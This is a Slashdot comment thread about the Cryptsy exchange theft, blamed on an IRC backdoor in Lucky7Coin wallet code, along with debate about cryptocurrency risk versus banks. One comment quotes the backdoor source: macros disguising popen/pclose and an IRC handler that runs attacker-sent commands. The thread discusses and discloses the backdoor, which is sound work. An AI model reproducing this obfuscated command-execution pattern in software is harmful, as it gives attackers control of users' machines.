Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com) 90
An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
No sympathy here. (Score:5, Insightful)
Summary is a lot of spin also... (Score:3)
Well, as the current Litecoin value is around $3, I dont think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?
Re: (Score:2)
We unfortunately have them, so the effects can't be ignored; but it takes an entire industry of obscurantist derivative pushers to produce the amount of chaos these exchanges handle daily.
Re: (Score:3)
All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?
Re: (Score:2, Informative)
All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?
No, it took Jimmy Carter to do that.
Re: (Score:2)
Carter just inherited the mess. Nixon was the one to blame:
https://en.wikipedia.org/wiki/... [wikipedia.org]
Re: (Score:2)
Yes in a lot of way it do exactly that. All the packages of cereal on the store shelves stayed the same size and so did the price but the content shrank. The price of fuel skyrocketed. All that talk of deflation and stagnation was bullshit. It only looked that way on the bottom line because there was sharp deflation in a particular asset class that happened to make up a large part of the economy. Worked out real well for you if you were looking to buy real-estate, not so well if you were and owner and
Re: (Score:2)
Re: Floriculture. (Score:2)
Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.
Re: (Score:2)
I don't feel any sympathy either, but your and my feelings aren't what's important here. We're still talking about a theft and on general principles I think the people who did it ought to be caught and punished.
HA HA (Score:3)
Re: (Score:3)
was it teleported out via a backdoor in the broker software? Or do you still own those shares and will the value come back as the market rises?
Re: (Score:2)
No, they buy high and sell low whenever the TV tells them to be interested, or afraid.
Re: (Score:2)
No one loses jack shit until they sell. Those who are automatically buying are going to make out like bandits.
Re: (Score:2)
Meanwhile.... 2.39% of my "realcoin" disappeared on Wall Street today...
Unless you mean someone accessed your account and transferred out 2.39% of your fiat then no, you analogy is wrong. Price fluctuation != Coins/Fiat leaving your account. With price fluctuation nothing is lost unless you sell. Without a sale that down 2.39% is trivia, just like the up 2.xx% the day before.
That is true if it is a pure investment, but not if it is a currency. Are you attempting to agree that cryptocurrency is so awful as currency, that it is not reliably spendable?
Stocks are not supposed to be liquid assets. Currency is. If you have to wait to spend it in order to not lose money, it is not liquid, and is therefore a complete failure as a currency.
Stocks are intended as shared ownership of a company, there are real reasons why that is on a different time scale than currency. When I used a finan
Re: (Score:2)
So put them into some kind of altcoin. I hear that's a really good place to put your money these days.
Re: (Score:2)
Actually, it's the other way around. The value of cash relative to "the market" increased today.
Re: (Score:2)
Fiat currency A --> bitcoins --> wallet --> backdoor --> El Chapo
Re: (Score:2)
Because what I want is to have to pay someone else to use my "money".
Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Re: (Score:2)
> Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Actually, you pay for that piece of paper over time, because the Treasury Department has to keep printing new ones to replace the ones that wear out, and printing and distributing cash costs money. It's buried in your federal taxes. Also, paper money isn't untraceable. Large bills go through readers that record the serial numbers, and can link that to who
Found a Trojan in the wallet? (Score:5, Funny)
Re: (Score:2)
No, no, the news is that it's a backdoor Trojan.
You're a decade late on anybody caring, though.
The internet is saving the world, through pr0n.
picante on my screen (Score:1)
Over and over (Score:5, Insightful)
This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.
Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them s going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.
I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Re: (Score:2)
I just know that I keep wanting to read the title as "Crappy Bitcoin Trader...".
Re: (Score:2)
What you said + and
Yes, real banks get robbed,
And real commercial banks don't debit the depositors for the money that was taken.
Re: (Score:2)
And real commercial banks don't debit the depositors for the money that was taken.
In Cyprus they did, and in Europe they will. Like the flu, it will hit these shores soon.
No, you're confusing the hyperbole with the facts. They're not interchangeable.
Re: (Score:2)
This, precisely.
We are all here statisticians.
Look at the population sizes and probabilities of the demographics.
As JustAnotherOldGuy points out, there are a few cyber coin exchanges and a shit load of headcount that would like to grab some play dough.
Given the small number of players inside the exchange perimeters as compared to the billions who are on the outside, trying to get in, and given that ALL players have the same goddam hardware and software and mental capabilities, the odds are that many peop
Re: (Score:2)
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
At least here in Norway real world bank robberies are extremely rare, mainly because the traditional banks barely have money anymore. Most of them simply have an indoor ATM and that's all the cash they have. Apart from all that goes electronic, most the cash come from ATMs/withdrawals in stores, the stores collect it and it goes via armored cars to a few teller centrals before it's distributed to ATMs again. We had one such robbery 12 years ago where they got away with the equivalent of ~10 million USD, tho
Re: (Score:2)
No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies.
You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen. The thing with normal banks is that they are enormous institutions with huge budgets for security (for obvious reasons).
"Look at it this way: there are maybe a half-dozen banks in your country, but there are essentially a limitless number of bad guys out ther
Re: (Score:2)
You do realize that normal banks also have websites, right? And that the money in your bank account isn't actually comprised of bills sitting in a locker?
Bank 'robberies' nowadays happen in a very different way than they used to, but they still happen.
You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?
And you do realize that the people who just lost their ass in the latest bitcoin robbery are shit out of luck, unlike me, right? And you do realize that the people who just got screwed in the latest bitcoin robbery will almost certainly never get a dime back, right, because according to the article itself, no one will even
Re: (Score:2)
You do realize that the money in my account is backed by the institution, right? And you do realize that the institution or the FDIC or the government will replace my money if it's stolen?
Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.
Works exactly the same?
Yes. I was pointing out your flawed logic, not stating that normal currencies and bitcoin-like currencies work exactly the same.
The notion that bitcoin-like currencies are different because the good guy (exchange) providers to bad guy hacke
Re: (Score:2)
Yes, I do, but it is irrelevant to the point I was making. You painted a very outdated picture of bank robberies with 'bullets flying around' and I corrected you (in a needlessly snarky way, admittedly). The idea that banks can only be 'robbed' physically is simply wrong.
I never said that they can only be robbed physically, even though it still is the most popular method.
The difference is that regardless of how the bank is robbed, I'll still get my money back. Whether it's with a gun or a trojan, I'll still get my money back. The same can't be said for x-coins. Look at Mt. Gox, Inputs.io, Sheep Marketplace, Silk Road, etc etc....none of the victims, to my knowledge, ever recovered a dime of the ~$180 million stolen.
Virtual currencies do have some serious, unavoidable probl
Re: (Score:2)
I never said that they can only be robbed physically, even though it still is the most popular method.
It is not:
http://abcnews.go.com/Business... [go.com]
https://www.fbi.gov/stats-serv... [fbi.gov]
http://www.informationweek.com... [informationweek.com]? (note that the stats are from 2006)
. Also, you said this:
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
Note how you the contrast you present completely focuses on the physical nature. Had you have said that banks have better digital security than some crappy Bitcoin-exchange there would have been no issue. To say that you didn't imply that the 'real time and effort' had to do with 'bullets flying around, get-away cars, bank guards, hauling t
Re: (Score:2)
The difference is that regardless of how the bank is robbed, I'll still get my money back.
This is still irrelevant to this thread, as I pointed out before.
Lol, hardly....that's what this whole thread is about. You put your money in a bank and it's relatively safe, even if it gets robbed.
If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.
Also, the stats you provided don't show shit:
1) One is a "look back" at "great bank robbers in history" (completely irrelevant),
2) The 2nd are FBI stats that ALSO don't show shit in terms of physical vs. electronic robbery,
3)
Re: (Score:2)
that's what this whole thread is about
It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.
If you put your money in bitCoin, dogeCoin, dinfinityCoin, whateverCoin, and if it's ripped off, it's gone. That's pretty much what I started out saying.
Again, nobody is saying otherwise or has said otherwise in this thread. Stop repeating irrelevant truths. It's just noise in this thread.
The article is actually all about stealing from the bank's customers.
Yes, that is what electronic bank robberies always amount to, be they of Bitcoin or of traditional currency. Only counting people stealing assets from the corporations themselves at this point would be stupid, as there is no
Re: (Score:2)
It's not. The whole 'bullets flying' and 'limitless number of bad guys' bullshit came out of your keyboard, not mine. Don't pretend that didn't happen.
Lol, found the BitCoin fundy.
Sorry, but it all boils down to this (which is what I said at the very beginning): something-coin stuff is still waaaaaay to immature and uncertain to have any credibility in the larger marketplace. But go ahead and feel free to trust "Slick Jimmy's BitCoins Savings and Loan and Stuff" if you like. :)
Even Mike Hearn, one of Bitcoins lead developers, has now quit and says, "Despite knowing that bitcoin could fail all along, the now inescapable conclusion that it has failed still
Re: (Score:2)
You lack the ability to stay on topic and the fortitude to admit when you are wrong. Good day.
Re: (Score:2)
>> I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Something tells me that you don't know anything about multisig wallets...
If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.
Re: (Score:2)
Something tells me that you don't know anything about multisig wallets...
If people would stop trusting 3rd parties to hold their bitcoins for them, then problems like the one at Cryptsy would stop.
Are you willing to go on record right now and state categorically that using multisig wallets will absolutely prevent your coins from being stolen, or that there is no way to hack, spoof, or otherwise get around the safety a multisig wallet provides?
I thought not.
Huh? (Score:2)
Blames Backdoor In the Code of a Wallet
Or maybe it was bad security.
Re: (Score:3)
It's been bad security for months.
Why people expect a robust, mature, and functioning degree of security in something which is brand new, and essentially the wild west is beyond me.
How many huge bitcoin thefts have there been? And just why would we think something which has value isn't going to be the target of theft?
These are lessons the banking industry has learned over decades, and taken steps to prevent.
But suddenly someone invents crypto currency and they act all surprise to get ripped off ... and the
Re: (Score:2)
>> Why the fuck do people keep believing that some wallet or exchange which came into existence a few months ago is secure?
The good news is, you don't need to worry if 3rd party exchanges or wallet providers are secure or not. Try using a multisig wallet (like at BitGo) where you hold two of the keys, and the company holds one. It takes two keys to conduct a transaction. If the company is hacked, your bitcoin can't be stolen. It really is that simple. I'm not saying it's impossible, but the risk
What? (Score:2)
I'm more shocked to learn that Litecoin went as up as $9.50.
WTF (Score:2)
A wallet is a non-executable data file.
You can't get a trojan from on.
Unless you're retarded and use a third party service or program to MANAGE wallets.
known for months (Score:5, Informative)
https://github.com/alerj78/luc... [github.com]
dooglus commented on Mar 8, 2015
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
#define S_ORDER(a,b,c,d) b##a##d##c
* OS-dependent memory page locking/unlocking.
* Defined as policy class to make stubbing for test possible.
*/
#define CLine S_ORDER(I,F,E,L)
* Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
* std::allocator templates.
*/
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) :%s\r", CBuff, pszName, result.c_str()).c_str());
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s
}
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
Re: (Score:2)
In a word? Bittards
Re: (Score:2)
Re: (Score:3)
Re: (Score:2)
Re: known for months (Score:2, Informative)
Irc was one of the initial means of peer discovery. It has been long since replaced with better mechanisms
Re: (Score:2)
Bitcoin is primarily for illegal activity right now.
Re: (Score:2)
That exact calculation was done by the Silk Road prosecutors, so we know that 4% of bitcoin transactions were for drugs during the time that marketplace was operating. Whereas for the world economy in general, illegal drugs account for 3% of GDP. It's not an entirely different picture, it's the same picture.
The Developer of Lucky7Coin... (Score:5, Informative)
It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.